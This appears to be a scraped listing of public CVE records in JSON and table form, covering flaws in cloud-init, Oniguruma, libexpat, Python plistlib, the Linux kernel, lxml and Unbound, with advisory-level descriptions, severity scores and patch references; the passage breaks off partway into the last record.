{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:57:25.074Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://github.com/canonical/cloud-init/commit/a378b7e4f47375458651c0972e7cd813f6fe0a6b" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://bugs.launchpad.net/cloud-init/+bug/2013967" }, { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-6042-1" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ATBJSXPL2IOAD2LDQRKWPLIC7QXS44GZ/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://github.com/canonical/cloud-init/releases", "packageName": "cloud-init", "platforms": [ "Linux" ], "product": "cloud-init", "repo": "https://github.com/canonical/cloud-init/", "vendor": "Canonical Ltd.", "versions": [ { "lessThan": "23.1.2", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "James Golovich" } ], "datePublic": "2023-04-26T00:00:00.000Z", "descriptions": [ { "lang": "en", "value": "Sensitive data could be exposed in logs of cloud-init before version 23.1.2. An attacker could use this information to find hashed passwords and possibly escalate their privilege." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-532", "description": "CWE-532", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-26T22:23:47.305Z", "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "shortName": "canonical" }, "references": [ { "tags": [ "patch" ], "url": "https://github.com/canonical/cloud-init/commit/a378b7e4f47375458651c0972e7cd813f6fe0a6b" }, { "tags": [ "issue-tracking" ], "url": "https://bugs.launchpad.net/cloud-init/+bug/2013967" }, { "tags": [ "vendor-advisory" ], "url": "https://ubuntu.com/security/notices/USN-6042-1" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ATBJSXPL2IOAD2LDQRKWPLIC7QXS44GZ/" } ], "title": "sensitive data exposure in cloud-init logs" } }, "cveMetadata": { "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "assignerShortName": "canonical", "cveId": "CVE-2023-1786", "datePublished": "2023-04-26T22:23:47.305Z", "dateReserved": "2023-03-31T20:40:07.757Z", "dateUpdated": "2024-08-02T05:57:25.074Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-13224
Vulnerability from cvelistv5
Published
2019-07-10 13:50
Modified
2024-08-04 23:49
Severity ?
EPSS score ?
Summary
A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.
References
▼ | URL | Tags |
---|---|---|
https://github.com/kkos/oniguruma/commit/0f7f61ed1b7b697e283e37bd2d731d0bd57adb55 | x_refsource_CONFIRM | |
https://lists.debian.org/debian-lts-announce/2019/07/msg00013.html | mailing-list, x_refsource_MLIST | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNL26OZSQRVLEO6JRNUVIMZTICXBNEQW/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWCPDTZOIUKGMFAD5NAKUB7FPJFAIQN5/ | vendor-advisory, x_refsource_FEDORA | |
https://usn.ubuntu.com/4088-1/ | vendor-advisory, x_refsource_UBUNTU | |
https://support.f5.com/csp/article/K00103182 | x_refsource_CONFIRM | |
https://support.f5.com/csp/article/K00103182?utm_source=f5support&%3Butm_medium=RSS | x_refsource_CONFIRM | |
https://security.gentoo.org/glsa/201911-03 | vendor-advisory, x_refsource_GENTOO |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T23:49:24.159Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/kkos/oniguruma/commit/0f7f61ed1b7b697e283e37bd2d731d0bd57adb55" }, { "name": "[debian-lts-announce] 20190717 [SECURITY] [DLA 1854-1] libonig security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00013.html" }, { "name": "FEDORA-2019-3f3d0953db", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNL26OZSQRVLEO6JRNUVIMZTICXBNEQW/" }, { "name": "FEDORA-2019-5409bb5e68", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWCPDTZOIUKGMFAD5NAKUB7FPJFAIQN5/" }, { "name": "USN-4088-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/4088-1/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.f5.com/csp/article/K00103182" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.f5.com/csp/article/K00103182?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "name": "GLSA-201911-03", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/201911-03" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-11-07T20:06:33", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/kkos/oniguruma/commit/0f7f61ed1b7b697e283e37bd2d731d0bd57adb55" }, { "name": "[debian-lts-announce] 20190717 [SECURITY] [DLA 1854-1] libonig security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00013.html" }, { "name": "FEDORA-2019-3f3d0953db", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNL26OZSQRVLEO6JRNUVIMZTICXBNEQW/" }, { "name": "FEDORA-2019-5409bb5e68", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWCPDTZOIUKGMFAD5NAKUB7FPJFAIQN5/" }, { "name": "USN-4088-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/4088-1/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.f5.com/csp/article/K00103182" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.f5.com/csp/article/K00103182?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "name": "GLSA-201911-03", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/201911-03" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2019-13224", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/kkos/oniguruma/commit/0f7f61ed1b7b697e283e37bd2d731d0bd57adb55", "refsource": "CONFIRM", "url": "https://github.com/kkos/oniguruma/commit/0f7f61ed1b7b697e283e37bd2d731d0bd57adb55" }, { "name": "[debian-lts-announce] 20190717 [SECURITY] [DLA 1854-1] libonig security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00013.html" }, { "name": "FEDORA-2019-3f3d0953db", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNL26OZSQRVLEO6JRNUVIMZTICXBNEQW/" }, { "name": "FEDORA-2019-5409bb5e68", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JWCPDTZOIUKGMFAD5NAKUB7FPJFAIQN5/" }, { "name": "USN-4088-1", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/4088-1/" }, { "name": "https://support.f5.com/csp/article/K00103182", "refsource": "CONFIRM", "url": "https://support.f5.com/csp/article/K00103182" }, { "name": "https://support.f5.com/csp/article/K00103182?utm_source=f5support\u0026amp;utm_medium=RSS", "refsource": "CONFIRM", "url": "https://support.f5.com/csp/article/K00103182?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "name": "GLSA-201911-03", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/201911-03" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-13224", "datePublished": "2019-07-10T13:50:57", "dateReserved": "2019-07-03T00:00:00", "dateUpdated": "2024-08-04T23:49:24.159Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52425
Vulnerability from cvelistv5
Published
2024-02-04 00:00
Modified
2024-08-26 19:22
Severity ?
EPSS score ?
Summary
libexpat through 2.5.0 allows a denial of service (resource consumption) because many full reparsings are required in the case of a large token for which multiple buffer fills are needed.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:55:41.543Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/libexpat/libexpat/pull/789" }, { "name": "FEDORA-2024-fbe1f0c1aa", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNRIHC7DVVRAIWFRGV23Y6UZXFBXSQDB/" }, { "name": "FEDORA-2024-b8656bc059", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WNUBSGZFEZOBHJFTAD42SAN4ATW2VEMV/" }, { "name": "[debian-lts-announce] 20240409 [SECURITY] [DLA 3783-1] expat security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00006.html" }, { "name": "[oss-security] 20240320 Security fixes in Python 3.10.14, 3.9.19, and 3.8.19 (CVE-2023-6597 \u0026 CVE-2024-0450)", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/20/5" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240614-0003/" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "libexpat", "vendor": "libexpat_project", "versions": [ { "lessThanOrEqual": "2.5.0", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-52425", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-26T19:20:56.852251Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-400", "description": "CWE-400 Uncontrolled Resource Consumption", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-08-26T19:22:48.969Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "libexpat through 2.5.0 allows a denial of service (resource consumption) because many full reparsings are required in the case of a large token for which multiple buffer fills are needed." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-14T13:06:11.482117", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/libexpat/libexpat/pull/789" }, { "name": "FEDORA-2024-fbe1f0c1aa", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNRIHC7DVVRAIWFRGV23Y6UZXFBXSQDB/" }, { "name": "FEDORA-2024-b8656bc059", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WNUBSGZFEZOBHJFTAD42SAN4ATW2VEMV/" }, { "name": "[debian-lts-announce] 20240409 [SECURITY] [DLA 3783-1] expat security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00006.html" }, { "name": "[oss-security] 20240320 Security fixes in Python 3.10.14, 3.9.19, and 3.8.19 (CVE-2023-6597 \u0026 CVE-2024-0450)", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/20/5" }, { "url": "https://security.netapp.com/advisory/ntap-20240614-0003/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-52425", "datePublished": "2024-02-04T00:00:00", "dateReserved": "2024-02-04T00:00:00", "dateUpdated": "2024-08-26T19:22:48.969Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-48564
Vulnerability from cvelistv5
Published
2023-08-22 00:00
Modified
2024-08-03 15:17
Severity ?
EPSS score ?
Summary
read_ints in plistlib.py in Python through 3.9.1 is vulnerable to a potential DoS attack via CPU and RAM exhaustion when processing malformed Apple Property List files in binary format.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T15:17:54.746Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugs.python.org/issue42103" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230929-0009/" }, { "name": "[debian-lts-announce] 20231011 [SECURITY] [DLA 3614-1] python3.7 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00017.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "read_ints in plistlib.py in Python through 3.9.1 is vulnerable to a potential DoS attack via CPU and RAM exhaustion when processing malformed Apple Property List files in binary format." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-11T22:06:16.594780", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugs.python.org/issue42103" }, { "url": "https://security.netapp.com/advisory/ntap-20230929-0009/" }, { "name": "[debian-lts-announce] 20231011 [SECURITY] [DLA 3614-1] python3.7 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00017.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-48564", "datePublished": "2023-08-22T00:00:00", "dateReserved": "2023-07-23T00:00:00", "dateUpdated": "2024-08-03T15:17:54.746Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4208
Vulnerability from cvelistv5
Published
2023-09-06 13:53
Modified
2024-08-02 07:17
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's net/sched: cls_u32 component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:17:12.134Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5492" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.5", "status": "affected", "version": "3.18", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "valis" }, { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Muhammad Alifa Ramdhan of STAR Labs" } ], "datePublic": "2023-08-01T03:10:36+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_u32 component can be exploited to achieve local privilege escalation.\n\nWhen u32_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit 3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-06T13:53:23.843Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81" }, { "url": "https://kernel.dance/3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81" }, { "url": "https://www.debian.org/security/2023/dsa-5492" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_u32 component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-4208", "datePublished": "2023-09-06T13:53:23.843Z", "dateReserved": "2023-08-07T13:02:26.235Z", "dateUpdated": "2024-08-02T07:17:12.134Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-3146
Vulnerability from cvelistv5
Published
2014-05-14 19:00
Modified
2024-08-06 10:35
Severity ?
EPSS score ?
Summary
Incomplete blacklist vulnerability in the lxml.html.clean module in lxml before 3.3.5 allows remote attackers to conduct cross-site scripting (XSS) attacks via control characters in the link scheme to the clean_html function.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T10:35:56.613Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "DSA-2941", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "http://www.debian.org/security/2014/dsa-2941" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://lxml.de/3.3/changes-3.3.5.html" }, { "name": "[oss-security] 20140509 Re: CVE request: python-lxml clean_html() input sanitization flaw", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2014/05/09/7" }, { "name": "USN-2217-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "http://www.ubuntu.com/usn/USN-2217-1" }, { "name": "[lxml] 20140415 lxml.html.clean vulnerability", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://mailman-mail5.webfaction.com/pipermail/lxml/2014-April/007128.html" }, { "name": "58744", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/58744" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://advisories.mageia.org/MGASA-2014-0218.html" }, { "name": "67159", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/67159" }, { "name": "MDVSA-2015:112", "tags": [ "vendor-advisory", "x_refsource_MANDRIVA", "x_transferred" ], "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:112" }, { "name": "58013", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/58013" }, { "name": "20140415 lxml (python lib) vulnerability", "tags": [ "mailing-list", "x_refsource_FULLDISC", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2014/Apr/210" }, { "name": "59008", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/59008" }, { "name": "openSUSE-SU-2014:0735", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-updates/2014-05/msg00083.html" }, { "name": "20140430 Re: lxml (python lib) vulnerability", "tags": [ "mailing-list", "x_refsource_FULLDISC", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2014/Apr/319" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-04-15T00:00:00", "descriptions": [ { "lang": "en", "value": "Incomplete blacklist vulnerability in the lxml.html.clean module in lxml before 3.3.5 allows remote attackers to conduct cross-site scripting (XSS) attacks via control characters in the link scheme to the clean_html function." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-12-28T19:57:01", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "DSA-2941", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "http://www.debian.org/security/2014/dsa-2941" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://lxml.de/3.3/changes-3.3.5.html" }, { "name": "[oss-security] 20140509 Re: CVE request: python-lxml clean_html() input sanitization flaw", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2014/05/09/7" }, { "name": "USN-2217-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "http://www.ubuntu.com/usn/USN-2217-1" }, { "name": "[lxml] 20140415 lxml.html.clean vulnerability", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://mailman-mail5.webfaction.com/pipermail/lxml/2014-April/007128.html" }, { "name": "58744", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/58744" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://advisories.mageia.org/MGASA-2014-0218.html" }, { "name": "67159", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/67159" }, { "name": "MDVSA-2015:112", "tags": [ "vendor-advisory", "x_refsource_MANDRIVA" ], "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:112" }, { "name": "58013", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/58013" }, { "name": "20140415 lxml (python lib) vulnerability", "tags": [ "mailing-list", "x_refsource_FULLDISC" ], "url": "http://seclists.org/fulldisclosure/2014/Apr/210" }, { "name": "59008", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/59008" }, { "name": "openSUSE-SU-2014:0735", "tags": [ "vendor-advisory", "x_refsource_SUSE" ], "url": "http://lists.opensuse.org/opensuse-updates/2014-05/msg00083.html" }, { "name": "20140430 Re: lxml (python lib) vulnerability", "tags": [ "mailing-list", "x_refsource_FULLDISC" ], "url": "http://seclists.org/fulldisclosure/2014/Apr/319" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2014-3146", "datePublished": "2014-05-14T19:00:00", "dateReserved": "2014-05-02T00:00:00", "dateUpdated": "2024-08-06T10:35:56.613Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-1488
Vulnerability from cvelistv5
Published
2024-02-15 05:04
Modified
2024-11-06 14:50
Severity ?
EPSS score ?
Summary
Unbound: unrestricted reconfiguration enabled to anyone that may lead to local privilege escalation
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:1750 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1751 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1780 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1801 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1802 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1804 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2587 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2696 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2024-1488 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2264183 | issue-tracking, x_refsource_REDHAT |
Impacted products
